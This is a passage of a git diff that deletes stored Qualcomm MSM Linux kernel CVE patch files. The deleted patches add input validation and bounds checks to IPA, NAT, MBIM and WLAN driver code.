-index f6ebd022..72342c2 100644
---- a/drivers/platform/msm/ipa/ipa_flt.c
-+++ b/drivers/platform/msm/ipa/ipa_flt.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -235,7 +235,7 @@ static int ipa_generate_flt_hw_rule(enum ipa_ip_type ip,
- * @ip: the ip address family type
- * @hdr_sz: header size
- *
-- * Returns: 0 on success, negative on failure
-+ * Returns: size on success, negative on failure
- *
- * caller needs to hold any needed locks to ensure integrity
- *
-@@ -373,7 +373,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- ((long)body &
- IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("tbl size is 0\n");
-+ WARN_ON(1);
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the flt tbl */
- flt_tbl_mem.size = tbl->sz;
- flt_tbl_mem.base =
-@@ -460,7 +465,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- ((long)body &
- IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("tbl size is 0\n");
-+ WARN_ON(1);
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the flt tbl */
- flt_tbl_mem.size = tbl->sz;
- flt_tbl_mem.base =
-@@ -534,8 +544,15 @@ static int ipa_generate_flt_hw_tbl_v1_1(enum ipa_ip_type ip,
- u8 *hdr;
- u8 *body;
- u8 *base;
-+ int res;
-+
-+ res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ if (res < 0) {
-+ IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+ return res;
-+ }
-
-- mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ mem->size = res;
- mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
-
- if (mem->size == 0) {
-@@ -720,6 +737,7 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- u32 *entr;
- u32 body_start_offset;
- u32 hdr_top;
-+ int res;
-
- if (ip == IPA_IP_v4)
- body_start_offset = IPA_MEM_PART(apps_v4_flt_ofst) -
-@@ -756,7 +774,13 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- entr++;
- }
-
-- mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ if (res < 0) {
-+ IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+ goto body_err;
-+ }
-+
-+ mem->size = res;
- mem->size -= hdr_sz;
- mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
-
-diff --git a/drivers/platform/msm/ipa/ipa_i.h b/drivers/platform/msm/ipa/ipa_i.h
-index f5bc437..adf6c0e 100644
---- a/drivers/platform/msm/ipa/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_i.h
-@@ -129,7 +129,7 @@
-
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- (((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE (128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE (256)
-
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
-diff --git a/drivers/platform/msm/ipa/ipa_nat.c b/drivers/platform/msm/ipa/ipa_nat.c
-index 299e5d1..b44de4f 100644
---- a/drivers/platform/msm/ipa/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_nat.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -25,6 +25,16 @@
- #define IPA_NAT_SHARED_MEMORY 1
- #define IPA_NAT_TEMP_MEM_SIZE 128
-
-+enum nat_table_type {
-+ IPA_NAT_BASE_TBL = 0,
-+ IPA_NAT_EXPN_TBL = 1,
-+ IPA_NAT_INDX_TBL = 2,
-+ IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
- static int ipa_nat_vma_fault_remap(
- struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -561,6 +571,71 @@ int ipa_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- ret = -EPERM;
- goto bail;
- }
-+
-+ for (cnt = 0; cnt < dma->entries; cnt++) {
-+ if (dma->dma[cnt].table_index >= 1) {
-+ IPAERR("Invalid table index %d\n",
-+ dma->dma[cnt].table_index);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ switch (dma->dma[cnt].base_addr) {
-+ case IPA_NAT_BASE_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa_ctx->nat_mem.size_expansion_tables *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDX_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDEX_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa_ctx->nat_mem.size_expansion_tables *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ default:
-+ IPAERR("Invalid base_addr %d\n",
-+ dma->dma[cnt].base_addr);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+ }
- size = sizeof(struct ipa_desc) * dma->entries;
- desc = kzalloc(size, GFP_KERNEL);
- if (desc == NULL) {
-diff --git a/drivers/platform/msm/ipa/ipa_rt.c b/drivers/platform/msm/ipa/ipa_rt.c
-index 6e1e44f..47767cd 100644
---- a/drivers/platform/msm/ipa/ipa_rt.c
-+++ b/drivers/platform/msm/ipa/ipa_rt.c
-@@ -189,7 +189,7 @@ int __ipa_generate_rt_hw_rule_v2_5(enum ipa_ip_type ip,
- * @hdr_sz: header size
- * @max_rt_idx: maximal index
- *
-- * Returns: 0 on success, negative on failure
-+ * Returns: size on success, negative on failure
- *
- * caller needs to hold any needed locks to ensure integrity
- *
-@@ -318,7 +318,11 @@ static int ipa_generate_rt_hw_tbl_common(enum ipa_ip_type ip, u8 *base, u8 *hdr,
- ((long)body &
- IPA_RT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("cannot generate 0 size table\n");
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the RT tbl */
- rt_tbl_mem.size = tbl->sz;
- rt_tbl_mem.base =
-@@ -391,8 +395,15 @@ static int ipa_generate_rt_hw_tbl_v1_1(enum ipa_ip_type ip,
- u8 *base;
- int max_rt_idx;
- int i;
-+ int res;
-
-- mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ if (res < 0) {
-+ IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+ goto error;
-+ }
-+
-+ mem->size = res;
- mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- ~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
-
-@@ -565,6 +576,7 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- int num_index;
- u32 body_start_offset;
- u32 apps_start_idx;
-+ int res;
-
- if (ip == IPA_IP_v4) {
- num_index = IPA_MEM_PART(v4_apps_rt_index_hi) -
-@@ -594,7 +606,13 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- entr++;
- }
-
-- mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ if (res < 0) {
-+ IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+ goto base_err;
-+ }
-+
-+ mem->size = res;
- mem->size -= hdr_sz;
- mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- ~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch
deleted file mode 100644
index a9937f0e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch
+++ /dev/null
@@ -1,382 +0,0 @@
-From d12370c7f3ecded1867fbd6b70ded35db55cab1d Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Wed, 19 Oct 2016 13:30:44 -0700
-Subject: msm: ipa: fix ioctl input param validation
-
-Fix input parameter validation in order to avoid
-device crash because of incorrect parameter in IPA driver.
-
-Change-Id: Icbdb05aeb9211665420a872d3453dbbd24fd347b
-CRs-Fixed: 1069060
-Acked-by: Ady Abraham
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_v2/ipa_flt.c | 36 ++++++++++++---
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h | 2 +-
- drivers/platform/msm/ipa/ipa_v2/ipa_nat.c | 77 ++++++++++++++++++++++++++++++-
- drivers/platform/msm/ipa/ipa_v2/ipa_rt.c | 26 +++++++++--
- drivers/platform/msm/ipa/ipa_v3/ipa_nat.c | 76 ++++++++++++++++++++++++++++++
- 5 files changed, 205 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c b/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-index c36ecfe..d6e563b 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -235,7 +235,7 @@ static int ipa_generate_flt_hw_rule(enum ipa_ip_type ip,
- * @ip: the ip address family type
- * @hdr_sz: header size
- *
-- * Returns: 0 on success, negative on failure
-+ * Returns: size on success, negative on failure
- *
- * caller needs to hold any needed locks to ensure integrity
- *
-@@ -373,7 +373,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- ((long)body &
- IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("tbl size is 0\n");
-+ WARN_ON(1);
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the flt tbl */
- flt_tbl_mem.size = tbl->sz;
- flt_tbl_mem.base =
-@@ -460,7 +465,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- ((long)body &
- IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("tbl size is 0\n");
-+ WARN_ON(1);
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the flt tbl */
- flt_tbl_mem.size = tbl->sz;
- flt_tbl_mem.base =
-@@ -534,8 +544,15 @@ static int ipa_generate_flt_hw_tbl_v1_1(enum ipa_ip_type ip,
- u8 *hdr;
- u8 *body;
- u8 *base;
-+ int res;
-+
-+ res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ if (res < 0) {
-+ IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+ return res;
-+ }
-
-- mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ mem->size = res;
- mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
-
- if (mem->size == 0) {
-@@ -720,6 +737,7 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- u32 *entr;
- u32 body_start_offset;
- u32 hdr_top;
-+ int res;
-
- if (ip == IPA_IP_v4)
- body_start_offset = IPA_MEM_PART(apps_v4_flt_ofst) -
-@@ -756,7 +774,13 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- entr++;
- }
-
-- mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+ if (res < 0) {
-+ IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+ goto body_err;
-+ }
-+
-+ mem->size = res;
- mem->size -= hdr_sz;
- mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index ba16682..1e3c098 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -137,7 +137,7 @@
-
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- (((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE (128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE (256)
-
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c b/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-index 6202992..314b095 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -25,6 +25,16 @@
- #define IPA_NAT_SHARED_MEMORY 1
- #define IPA_NAT_TEMP_MEM_SIZE 128
-
-+enum nat_table_type {
-+ IPA_NAT_BASE_TBL = 0,
-+ IPA_NAT_EXPN_TBL = 1,
-+ IPA_NAT_INDX_TBL = 2,
-+ IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
- static int ipa_nat_vma_fault_remap(
- struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -568,6 +578,71 @@ int ipa2_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- goto bail;
- }
-
-+ for (cnt = 0; cnt < dma->entries; cnt++) {
-+ if (dma->dma[cnt].table_index >= 1) {
-+ IPAERR("Invalid table index %d\n",
-+ dma->dma[cnt].table_index);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ switch (dma->dma[cnt].base_addr) {
-+ case IPA_NAT_BASE_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa_ctx->nat_mem.size_expansion_tables *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDX_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDEX_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa_ctx->nat_mem.size_expansion_tables *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ default:
-+ IPAERR("Invalid base_addr %d\n",
-+ dma->dma[cnt].base_addr);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+ }
-+
- size = sizeof(struct ipa_desc) * NUM_OF_DESC;
- desc = kzalloc(size, GFP_KERNEL);
- if (desc == NULL) {
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c b/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-index 4ec43dd..8efc2d8 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-@@ -227,7 +227,7 @@ int __ipa_generate_rt_hw_rule_v2_6L(enum ipa_ip_type ip,
- * @hdr_sz: header size
- * @max_rt_idx: maximal index
- *
-- * Returns: 0 on success, negative on failure
-+ * Returns: size on success, negative on failure
- *
- * caller needs to hold any needed locks to ensure integrity
- *
-@@ -356,7 +356,11 @@ static int ipa_generate_rt_hw_tbl_common(enum ipa_ip_type ip, u8 *base, u8 *hdr,
- ((long)body &
- IPA_RT_ENTRY_MEMORY_ALLIGNMENT));
- } else {
-- WARN_ON(tbl->sz == 0);
-+ if (tbl->sz == 0) {
-+ IPAERR("cannot generate 0 size table\n");
-+ goto proc_err;
-+ }
-+
- /* allocate memory for the RT tbl */
- rt_tbl_mem.size = tbl->sz;
- rt_tbl_mem.base =
-@@ -429,8 +433,15 @@ static int ipa_generate_rt_hw_tbl_v1_1(enum ipa_ip_type ip,
- u8 *base;
- int max_rt_idx;
- int i;
-+ int res;
-
-- mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ if (res < 0) {
-+ IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+ goto error;
-+ }
-+
-+ mem->size = res;
- mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- ~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
-
-@@ -603,6 +614,7 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- int num_index;
- u32 body_start_offset;
- u32 apps_start_idx;
-+ int res;
-
- if (ip == IPA_IP_v4) {
- num_index = IPA_MEM_PART(v4_apps_rt_index_hi) -
-@@ -632,7 +644,13 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- entr++;
- }
-
-- mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+ if (res < 0) {
-+ IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+ goto base_err;
-+ }
-+
-+ mem->size = res;
- mem->size -= hdr_sz;
- mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- ~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c b/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-index 67e9b39..e7e5cf1 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-@@ -24,6 +24,17 @@
-
- #define IPA_NAT_TEMP_MEM_SIZE 128
-
-+enum nat_table_type {
-+ IPA_NAT_BASE_TBL = 0,
-+ IPA_NAT_EXPN_TBL = 1,
-+ IPA_NAT_INDX_TBL = 2,
-+ IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
-+
- static int ipa3_nat_vma_fault_remap(
- struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -571,6 +582,71 @@ int ipa3_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- goto bail;
- }
-
-+ for (cnt = 0; cnt < dma->entries; cnt++) {
-+ if (dma->dma[cnt].table_index >= 1) {
-+ IPAERR("Invalid table index %d\n",
-+ dma->dma[cnt].table_index);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ switch (dma->dma[cnt].base_addr) {
-+ case IPA_NAT_BASE_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa3_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa3_ctx->nat_mem.size_expansion_tables *
-+ NAT_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDX_TBL:
-+ if (dma->dma[cnt].offset >=
-+ (ipa3_ctx->nat_mem.size_base_tables + 1) *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ case IPA_NAT_INDEX_EXPN_TBL:
-+ if (dma->dma[cnt].offset >=
-+ ipa3_ctx->nat_mem.size_expansion_tables *
-+ NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+ IPAERR("Invalid offset %d\n",
-+ dma->dma[cnt].offset);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+
-+ break;
-+
-+ default:
-+ IPAERR("Invalid base_addr %d\n",
-+ dma->dma[cnt].base_addr);
-+ ret = -EPERM;
-+ goto bail;
-+ }
-+ }
-+
- size = sizeof(struct ipa3_desc) * NUM_OF_DESC;
- desc = kzalloc(size, GFP_KERNEL);
- if (desc == NULL) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch
deleted file mode 100644
index 2389d8b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 5bb0059243515ecdac138cfdb4cee7259bbd0bbc Mon Sep 17 00:00:00 2001
-From: Subrat Dash
-Date: Wed, 3 Aug 2016 16:47:39 +0530
-Subject: qcacld-2.0: Fix VHT-80 IBSS stops beaconing
-
-A STA entry is created for each peer joining
-the network to take care of the peer specific
-capabilities.
-
-The VDEV need not be reconfigured for IBSS peer
-with different channel width joining the network.
-
-Change-Id: Iec6ec5d2b510b84538f4e5300b3f1c5cc63b334d
-CRs-Fixed: 1046409
----
- CORE/MAC/src/pe/sch/schBeaconProcess.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/MAC/src/pe/sch/schBeaconProcess.c b/CORE/MAC/src/pe/sch/schBeaconProcess.c
-index a28f2be..4ed8aea 100644
---- a/CORE/MAC/src/pe/sch/schBeaconProcess.c
-+++ b/CORE/MAC/src/pe/sch/schBeaconProcess.c
-@@ -465,7 +465,8 @@ static void __schBeaconProcessForSession( tpAniSirGlobal pMac,
- sendProbeReq = TRUE;
- }
-
-- if ( psessionEntry->htCapability && pBeacon->HTInfo.present )
-+ if (psessionEntry->htCapability && pBeacon->HTInfo.present &&
-+ (!LIM_IS_IBSS_ROLE(psessionEntry)))
- {
- limUpdateStaRunTimeHTSwitchChnlParams( pMac, &pBeacon->HTInfo, bssIdx,psessionEntry);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch
deleted file mode 100644
index 905e786c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From b8199c2b852f1e23c988e10b8fbb8d34c98b4a1c Mon Sep 17 00:00:00 2001
-From: Arumuga Durai A
-Date: Tue, 27 Dec 2016 19:50:06 +0530
-Subject: USB: gadget: mbim: Avoid copying uninitialized data to userspace
-
-A race condition bug in function 'mbim_bind_config' allows to
-change 'mbim->xport' type to invalid value. This allows
-mbim_ioctl() to copy the uninitialized data to userspace. Fix
-this by avoiding copy_to_user() call when transport type is invalid.
-
-Change-Id: If8e8b6d4e2c347e1aff529bed0a798128eaea07c
-CRs-Fixed: 1102418
-Signed-off-by: Arumuga Durai A
----
- drivers/usb/gadget/function/f_mbim.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/function/f_mbim.c b/drivers/usb/gadget/function/f_mbim.c
-index 717ee23..84c0066 100644
---- a/drivers/usb/gadget/function/f_mbim.c
-+++ b/drivers/usb/gadget/function/f_mbim.c
-@@ -2030,7 +2030,7 @@ static long mbim_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- default:
- ret = -ENODEV;
- pr_err("unknown transport\n");
-- break;
-+ goto fail;
- }
-
- ret = copy_to_user((void __user *)arg, &info,
-@@ -2046,6 +2046,7 @@ static long mbim_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- ret = -EINVAL;
- }
-
-+fail:
- mbim_unlock(&mbim->ioctl_excl);
-
- return ret;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch
deleted file mode 100644
index 83db6b71..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 93863644b4547324309613361d70ad9dc91f8dfd Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Tue, 14 Feb 2017 16:00:57 +0530
-Subject: qcacld-2.0: Trim operation classes to max supported in change station
-
-Operation classes supported can be controlled by user, which can
-be sent greater than the max supported operations. This results
-in stack overflow in change station command.
-
-Add check to validate operations supported param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2002052
-Change-Id: Idd3a35e38b091546a17d7ec6329f19429e5c289c
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 8fc43a7..f82f258 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -13809,6 +13809,15 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
- "%s: After removing duplcates StaParams.supported_channels_len: %d",
- __func__, StaParams.supported_channels_len);
- }
-+ if (params->supported_oper_classes_len >
-+ SIR_MAC_MAX_SUPP_OPER_CLASSES) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+ "received oper classes:%d, resetting it to max supported %d",
-+ params->supported_oper_classes_len,
-+ SIR_MAC_MAX_SUPP_OPER_CLASSES);
-+ params->supported_oper_classes_len =
-+ SIR_MAC_MAX_SUPP_OPER_CLASSES;
-+ }
- vos_mem_copy(StaParams.supported_oper_classes,
- params->supported_oper_classes,
- params->supported_oper_classes_len);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch
deleted file mode 100644
index 37d269c3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
